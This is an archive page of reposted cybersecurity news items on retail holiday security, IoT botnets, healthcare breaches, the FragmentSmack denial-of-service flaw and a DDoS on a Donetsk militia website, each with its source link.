DDoS Protection Specialist Archive

The majority of UK retailers are planning to increase cyber security measures during the Christmas season, a survey reveals

Retailers plan to increase cyber security measures during the holiday season, according to a poll of IT professionals in the sector in the UK, Germany, Belgium, the Netherlands, Luxembourg and the US.

Some 63% of UK and 62% of German retailers claimed to increase cyber security measures during the holiday season, according to the survey, commissioned by IT automation and security firm Infoblox.

The main reason cited for the increase by one-third of respondents in these countries was a seasonal rise in social engineering attacks, which were also identified as a dominant concern for 25% of IT professionals in the Netherlands’ retail sector.

Other kinds of attack cited were social media scams, distributed denial of service (DDoS) and ransomware.

Social media scams were of most concern in the US (19%), followed by the UK (15%), the Netherlands (14%) and Germany (12%).

DDoS attacks were of greatest concern in the Netherlands (20%), followed by Germany (17%), the UK (12%) and the US (7%).

Ransomware was of greatest concern in the US (12%), followed by Germany (11%), the UK (10%) and the Netherlands (9%).

The research found that among the main threats posed to networks within the UK were unpatched security vulnerabilities (28%), online consumers themselves (25%) and internet-connected devices (21%).

Within the UK, artificial intelligence (43%) was cited as the technology most likely to be implemented within the next year, followed by internet-connected devices (35%), portable media technology (24%), omni-channel technology (23%) and augmented reality (17%).

The majority of IT decision-makers in the UK (55%) said they were concerned about new technologies, in stark contrast to those in the Netherlands, where only 20% claimed to be concerned.

The survey also polled consumers on their experiences and attitudes towards online data privacy and security while shopping online.

Although most global consumers shop online to some degree, 17% do nothing to protect their data while doing so. The UK is the most complacent, with just one in five taking no proactive action to protect their data. German consumers are more cautious when shopping online, with more than half (53%) shopping only on secured Wi-Fi networks.

“The level of online shopping activity always increases significantly during the holiday season, and can provide rich pickings for the opportunistic cyber criminal, so it’s no coincidence that more than half of retailers will increase their cyber security spending during their most prosperous and dangerous time of year,” said Gary Cox, technology director, western Europe at Infoblox.

“It is critical that enterprises take measures to get additional network visibility, so they can respond quickly to potential cyber incidents which could result in lost revenue and brand damage.”

IT professionals in the UK named unpatched security vulnerabilities as the main source of an attack (28%), followed by consumer/end-user error (25%), vulnerabilities in the supply chain (22%), and unprotected internet-connected devices (21%).

When holiday shopping, delivery is the biggest point of concern for UK consumers (55%), followed by ID fraud (16%), data security (13%) and website crashing (13%).

Just 48% of UK consumers said they were only “somewhat” or “not at all” aware of the data being collected through store loyalty cards, while only 34% claimed to trust retailers to hold their personal data.

“It is interesting that so few consumers around the world are actively concerned with the protection of their own data when shopping online, particularly when two-thirds of those we surveyed had little trust in how retailers held that data,” said Cox.

“More education is clearly required about the risks that online shoppers face, especially over Christmas, and the steps they can take to better protect their own data and identity from those intent on theft and fraud.”

Source: https://www.computerweekly.com/news/252454330/Most-UK-retailers-plan-to-up-cyber-security

For some time threat actors who create Internet of Things-based botnets have been relying on brute force attacks to take control of and build chains of devices for delivering malware or distributed denial of service attacks.

But according to a report out today from Netscout, as more secure IoT devices are being installed hackers are also adding a new takeover strategy: Exploiting vulnerabilities in the devices.

“In November our honeypot observed several older IoT vulnerabilities being used as a means to deliver malware,” says researchers in a blog. “Our data indicates it takes less than one day before a new IoT device is hit with exploitation attempts against known vulnerabilities.”

By comparison, it can take as little as five minutes after an IoT device is connected to the Internet and it will be subjected to  brute force login attempts using default IoT credentials. Still, vulnerability attacks can pay off becuase of the difficulties and slow cadence of patching IoT devices.

One factor that helps attackers is that IoT devices often sit on a distributor’s shelf for a while before being sold and installed on a network, say researchers. If a security update is released for the device it won’t be applied until the patch team updates it — assuming it is updated.

As evidenced the blog notes that in November its honeypot detected a number of attempts to exploit older IoT vulnerabilities to deliver variants of the Mirai botnet to devices.

“As the rate of patching IoT devices is done at a glacial pace, these older vulnerabilities are still leveraged by IoT botnets due to their level of success,” say researchers. “The continued use of these tried and true vulnerabilities highlights “what is old is new” when it comes to IoT botnets.”

Due to the sheer number of IoT devices connected to the internet, finding vulnerable devices is easy and quick. Add to the mix the large delta of when a vulnerable device is “turned on” and when updates for security vulnerabilities are applied, and attackers can quickly amass large botnets. In most cases these botnets are immediately conscripted into a DDoS army. It doesn’t take a significant amount of effort to create a large IoT botnet and create havoc, as we saw with the DDoS attacks conducted by Mirai in 2016.

 Source: https://www.itworldcanada.com/article/patch-new-iot-devices-fast-researchers-warn-or-theyll-be-in-a-botnet/412913

Radware’s ERT and Threat Research Center monitored an immense number of events over the last year, giving us a chance to review and analyze attack patterns to gain further insight into today’s trends and changes in the attack landscape. Here are some insights into what we have observed over the last year.

Healthcare Under Attack

Over the last decade there has been a dramatic digital transformation within healthcare; more facilities are relying on electronic forms and online processes to help improve and streamline the patient experience. As a result, the medical industry has new responsibilities and priorities to ensure client data is kept secure and available–which unfortunately aren’t always kept up with.

This year, the healthcare industry dominated news with an ever-growing list of breaches and attacks. Aetna, CarePlus, Partners Healthcare, BJC Healthcare, St. Peter’s Surgery and Endoscopy Center, ATI Physical Therapy, Inogen, UnityPoint Health, Nuance Communication, LifeBridge Health, Aultman Health Foundation, Med Associates and more recently Nashville Metro Public Health, UMC Physicians, and LabCorp Diagnostics have all disclosed or settled major breaches.

Generally speaking, the risk of falling prey to data breaches is high, due to password sharing, outdated and unpatched software, or exposed and vulnerable servers. When you look at medical facilities in particular, other risks begin to appear, like those surrounding the number of hospital employees who have full or partial access to your health records during your stay there. The possibilities for a malicious insider or abuse of access is also very high, as is the risk of third party breaches. For example, it was recently disclosed that NHS patient records may have been exposed when passwords were stolen from Embrace Learning, a training business used by healthcare workers to learn about data protection.

Profiting From Medical Data

These recent cyber-attacks targeting the healthcare industry underscore the growing threat to hospitals, medical institutions and insurance companies around the world. So, what’s driving the trend? Profit. Personal data, specifically healthcare records, are in demand and quite valuable on today’s black market, often fetching more money per record than your financial records, and are a crucial part of today’s Fullz packages sold by cyber criminals.

Not only are criminals exfiltrating patient data and selling it for a profit, but others have opted to encrypt medical records with ransomware or hold the data hostage until their extortion demand is met. Often hospitals are quick to pay an extortionist because backups are non-existent, or it may take too long to restore services. Because of this, cyber-criminals have a focus on this industry.

Most of the attacks targeting the medical industry are ransomware attacks, often delivered via phishing campaigns. There have also been cases where ransomware and malware have been delivered via drive-by downloads and comprised third party vendors. We have also seen criminals use SQL injections to steal data from medical applications as well as flooding those networks with DDoS attacks. More recently, we have seen large scale scanning and exploitation of internet connected devicesfor the purpose of crypto mining, some of which have been located inside medical networks. In addition to causing outages and encrypting data, these attacks have resulted in canceling elective cases, diverting incoming patients and rescheduling surgeries.

For-profit hackers will target and launch a number of different attacks against medical networks designed to obtain and steal your personal information from vulnerable or exposed databases. They are looking for a complete or partial set of information such as name, date of birth, Social Security numbers, diagnosis or treatment information, Medicare or Medicaid identification number, medical record number, billing/claims information, health insurance information, disability code, birth or marriage certificate information, Employer Identification Number, driver’s license numbers, passport information, banking or financial account numbers, and usernames and passwords so they can resell that information for a profit.

Sometimes the data obtained by the criminal is incomplete, but that data can be leveraged as a stepping stone to gather additional information. Criminals can use partial information to create a spear-phishing kit designed to gain your trust by citing a piece of personal information as bait. And they’ll move very quickly once they gain access to PHI or payment information. Criminals will normally sell the information obtained, even if incomplete, in bulk or in packages on private forums to other criminals who have the ability to complete the Fullz package or quickly cash the accounts out. Stolen data will also find its way to public auctions and marketplaces on the dark net, where sellers try to get the highest price possible for data or gain attention and notoriety for the hack.

Don’t let healthcare data slip through the cracks; be prepared.

Source: https://securityboulevard.com/2018/12/2018-in-review-healthcare-under-attack/

FragmentSmack, a DDoS vulnerability first discovered in Linux, affects Windows as well as nearly 90 Cisco products. Discover how it can be exploited with Judith Myerson.

A distributed denial-of-service vulnerability called FragmentSmack enables an unauthenticated remote attacker to disable servers with a stream of fragmented IP packets that activate the vulnerability on affected systems. First discovered in Linux, and now also found in Windows, FragmentSmack affects many products, including nearly 90 from Cisco. How can this vulnerability be exploited, and how big is the threat?
FragmentSmack is a vulnerability in the IP stack that can be used to execute a distributed denial-of-service attack. The vulnerability affects Linux kernel version 3.9 or later, and it was discovered in some Cisco products by the Vulnerability Coordination team of the National Cyber Security Centre of Finland and the CERT Coordination Center. The flaw is caused by inefficient algorithms used in IP implementations to reassemble fragmented IPv4 and IPv6 packets.

An attacker using the FragmentSmack vulnerability could exploit it remotely by continuously sending crafted packets — that appear to be fragments of larger packets that need to be reassembled — to cause the system to become unresponsive, as 100% of the CPU cores will be in use.

In one scenario, an attacker could send a stream of 8-byte sized IP fragments, each starting with randomly chosen offset values, to a server. The queue of malformed IP fragments waiting for reassembly — which will never happen because the fragments are not part of any legitimate packets — increases in size until all the CPU core resources are consumed, leaving no room for other tasks the system needs to perform.

The attacker doesn’t specify what core the malformed packets are sent to and the Linux kernel automatically distributes the reassembly to different cores. While such an attack could take a server down, once the flow of malicious fragments stops, the targeted server can resume its normal function.

Cisco’s vulnerable listed products include network and content security devices, voice and unified communications devices, and telepresence and transcending devices.

Likewise, this threat has extended to Microsoft and Red Hat, and the affected Microsoft’s Window systems include versions 7, 8.1 and 10, as well as all the Windows Server versions. Windows 10 — 64 bit — in particular, features an option for Windows Subsystem for Linux that is vulnerable. Turning off this option doesn’t prevent the attacker from exploiting the vulnerability, however.

Vulnerable Red Hat products include Virtualization 4, Enterprise MRG, Enterprise Linux Atomic Host and Enterprise Linux versions 6, 7, Real Time 7, 7 for ARM64 and 7 for Power.

Source: https://searchsecurity.techtarget.com/answer/FragmentSmack-How-is-this-denial-of-service-exploited

The website of the people’s militia department of the self-proclaimed Donetsk people’s republic was subjected to DDoS attacks, said the head of the people’s militia press service, Daniel Bezsonov.

According to him, this happened after the agency announced that Kiev was preparing a large-scale offensive in the Donbass.

“It has been established that the attack was carried out from the Ukrainian and Baltic IP addresses,” Betsonov quoted the Donetsk News Agency.

In October 2016, the DPR announced that hackers from Ukraine had hacked and blocked the database of the self-proclaimed Donetsk People’s Republic pension fund, as a result of which payments to DPR residents were suspended.

Source: http://www.tellerreport.com/news/–in-the-dni-reported-on-ddos-attack-on-the-site-of-the-national-police-.BkyHtk6JE.html